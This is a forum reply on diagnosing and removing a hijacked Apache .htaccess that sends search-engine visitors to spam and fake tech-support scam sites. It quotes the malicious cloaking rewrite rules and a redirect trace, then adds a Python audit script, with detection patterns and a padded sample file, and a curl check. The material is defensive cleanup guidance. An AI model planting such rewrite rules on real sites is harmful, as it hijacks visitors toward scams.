woodenturner wrote:... Could be something that's been added to the .htaccess file...
After a bunch of looking and testing, I believe you hit the nail on the head with the .htaccess file.
----------------------------------------------------------------------------------------
A GET request is sent to 104.131.131.106:80
{request header}
Host: top-24h-can-store.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: -
http://top-24h-can-store.com/redirect.php?z=viagra
Connection: keep-alive
The remote host sets a 302 status (temporary redirect)
{response header}
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Date: Sat, 30 Jul 2016 12:01:41 GMT
Keep-Alive: timeout=5, max=100
Location: -
http://1empiredirect.com/redirect?aff_i ... uid%3D2382
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: visited=1; expires=Thu, 04-Aug-2016 12:01:41 GMT; Max-Age=432000
X-Powered-By: PHP/5.5.9-1ubuntu4.3
And this is where everybody gets sent off to the porn and dating sites and, eventually, if they try to back out instead of just closing the browser or right-clicking the 'back' button to get to a point *before* the redirect, they get the fake computer virus warning with the scam 'tech support' phone number.
Tom, you need to FTP into the server and download the .htaccess file; it should be in the root directory and may be 'hidden'. The .htaccess file is an Apache system file, so you may need to select something like "show hidden files" when you open your file manager. Once you locate the file, check its contents for code that looks like this:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]
and
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)
RewriteRule . http: // top-24h-can-store . com /redirect.php?z=viagra [L]
There may be a "decoy" file, htaccess or .taccess, to be confused with the real file, and when you check the contents be sure you scroll all the way to the end of the file, as hackers may add hundreds of blank lines before any malicious directives.
You will need to clean up the .htaccess file and remove any "rogue" PHP files (if there are any; I don't think there are, I think they keep the scripts on the other servers) to clean up the hack.
All you should have to do is delete the code shown above, along with the blank lines, save the file and then upload it back to the server ---> make sure to *overwrite* the old .htaccess with the new one you just edited.
Once you've done this, the problem *should* be solved... except that you'll need to change the login and password, as it has obviously been compromised.
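The checks this reply describes (search-engine-keyed RewriteCond chains, redirects to a foreign host, blank-line padding before the rogue directives, and decoy files named like .htaccess) can be automated so nothing at the bottom of a padded file is missed. The script below is an added example and not code from the post or from anyone in this thread. Its list of search-engine names is taken from the rules quoted above, the .htaccess it audits is a constructed sample that uses the stand-in domain attacker.example instead of the real one, and the decoy-file heuristic (any name containing "taccess" other than the real file) is this example's own assumption.

```python
"""Audit an Apache .htaccess for the search-engine cloaking redirect described above.

Added example, not code from the original post. It (1) flags RewriteRule blocks whose
preceding RewriteConds test HTTP_REFERER or HTTP_USER_AGENT for search-engine names,
(2) flags rules whose target is an absolute external URL, (3) measures the longest run
of blank lines (the padding trick) and (4) lists decoy files whose names mimic .htaccess.
The patterns, sample .htaccess and stand-in domain are constructed for this example.
"""
import os
import re
import tempfile

# Engine names taken from the rules quoted in the post ('search' and 'seznam' included).
SEARCH_ENGINE_RE = re.compile(r"google|yahoo|msn|aol|bing|seznam|search", re.I)
# Only conditions on the two request headers used for cloaking are of interest here.
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
ABSOLUTE_URL_RE = re.compile(r"^https?://", re.I)

# Constructed sample: two legitimate lines, 300 blank lines of padding, then rules
# shaped like the ones quoted in the post (attacker.example is a stand-in domain).
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^old-page$ /new-page [R=301,L]\n"
    + "\n" * 300 +
    "RewriteEngine On\n"
    "RewriteCond %{ENV:REDIRECT_STATUS} 200\n"
    "RewriteRule ^ - [L]\n"
    "RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\n"
    "RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\n"
    "RewriteRule ^(.*)$ excrescent-interfacer.php?$1 [L]\n"
    "RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|Seznam|seznam)\n"
    "RewriteRule . http://attacker.example/redirect.php?z=viagra [L]\n"
)


def longest_blank_run(lines):
    """Return (length, last_line_no) of the longest run of blank lines, 1-based."""
    best, run = (0, 0), 0
    for no, line in enumerate(lines, 1):
        run = run + 1 if line.strip() == "" else 0
        if run > best[0]:
            best = (run, no)
    return best


def audit_htaccess(text):
    """Parse .htaccess text; report cloaked or external redirects plus blank-line padding."""
    lines = text.splitlines()
    suspicious, pending = [], []  # pending: RewriteConds waiting for their RewriteRule
    for no, line in enumerate(lines, 1):
        cond = COND_RE.match(line)
        if cond:
            pending.append((no, cond.group(1).upper(), cond.group(2)))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue  # comments, blank lines and other directives leave the chain alone
        target = rule.group(2)
        cloaking = [c for c in pending if SEARCH_ENGINE_RE.search(c[2])]
        external = bool(ABSOLUTE_URL_RE.match(target))
        if cloaking or external:
            suspicious.append({"line": no, "target": target,
                               "cloaking_conds": cloaking, "external": external})
        pending = []  # in Apache, RewriteConds apply only to the next RewriteRule
    pad_len, pad_end = longest_blank_run(lines)
    return {"suspicious_rules": suspicious, "padding_lines": pad_len, "padding_ends_at": pad_end}


def find_decoy_files(directory):
    """Names that imitate .htaccess ('htaccess', '.taccess', '.htaccess.bak', ...) but are not it.
    Heuristic (assumption): any name containing 'taccess' other than the real file."""
    return sorted(n for n in os.listdir(directory)
                  if n.lower() != ".htaccess" and "taccess" in n.lower())


def make_demo_dir():
    """Create a throwaway web root with the sample .htaccess and two decoys (constructed)."""
    root = tempfile.mkdtemp()
    for name in (".htaccess", "htaccess", ".taccess", "index.php"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(SAMPLE_HTACCESS if name == ".htaccess" else "")
    return root


if __name__ == "__main__":
    report = audit_htaccess(SAMPLE_HTACCESS)
    print(f"longest padding run: {report['padding_lines']} blank lines, "
          f"ending at line {report['padding_ends_at']}")
    for r in report["suspicious_rules"]:
        kind = "external" if r["external"] else "local"
        conds = ", ".join(f"line {n}: {v} {p}" for n, v, p in r["cloaking_conds"]) or "none"
        print(f"line {r['line']}: RewriteRule -> {r['target']} ({kind}); cloaking conds: {conds}")
    print("decoy files:", find_decoy_files(make_demo_dir()))
```

Run it against the downloaded .htaccess by passing the file's text to audit_htaccess(), and against the web root with find_decoy_files(). Any rule it reports as "external" deserves a look even when it is legitimate (a site's own HTTP-to-HTTPS 301 will show up too); a rule reported with cloaking conditions is the pattern in the post and should go. After uploading the cleaned file, confirm the rewrite is really gone from outside with curl, sending the headers the rules keyed on, e.g. `curl -sI -e 'https://www.google.com/' -A 'Googlebot' http://yoursite/`, and check that the response is no longer a 302 with a Location on a foreign host.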